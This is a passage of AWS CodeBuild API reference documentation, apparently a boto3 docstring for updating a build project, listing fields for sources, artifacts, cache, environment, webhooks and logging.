* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build project.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux enviornment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other three local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overriden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build project.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is be used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait before timing out any related build that did not get marked as completed. The default is 60 minutes.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
- **tags** *(list) --*
The tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag's key.
- **value** *(string) --*
The tag's value.
- **created** *(datetime) --*
When the build project was created, expressed in Unix time format.
- **lastModified** *(datetime) --*
When the build project's settings were last modified, expressed in Unix time format.
- **webhook** *(dict) --*
Information about a webhook that connects repository events to a build project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
- **vpcConfig** *(dict) --*
Information about the VPC configuration that AWS CodeBuild accesses.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
- **badge** *(dict) --*
Information about the build badge for the build project.
- **badgeEnabled** *(boolean) --*
Set this to true to generate a publicly accessible URL for your project's build badge.
- **badgeRequestUrl** *(string) --*
The publicly-accessible URL through which you can access the build badge for your project.
The publicly accessible URL through which you can access the build badge for your project.
- **logsConfig** *(dict) --*
Information about logs for the build project. A project can create logs in Amazon CloudWatch Logs, an S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
:type name: string
:param name: **[REQUIRED]**
The name of the build project.
.. note::
You cannot change a build project\'s name.
:type description: string
:param description:
A new or replacement description of the build project.
:type source: dict
:param source:
Information to be changed about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline\'s source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console\'s use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build\'s start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
:type secondarySources: list
:param secondarySources:
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline\'s source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console\'s use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build\'s start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
:type artifacts: dict
:param artifacts:
Information to be changed about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type secondaryArtifacts: list
:param secondaryArtifacts:
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type cache: dict
:param cache:
Stores recently used information so that it can be quickly accessed at a later time.
- **type** *(string) --* **[REQUIRED]**
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux enviornment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other three local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overriden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
:type environment: dict
:param environment:
Information to be changed about the build environment for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build environment to use for related builds.
- **image** *(string) --* **[REQUIRED]**
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag \"latest,\" use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest \"sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf,\" use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --* **[REQUIRED]**
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --* **[REQUIRED]**
The name or key of the environment variable.
- **value** *(string) --* **[REQUIRED]**
The value of the environment variable.
.. warning::
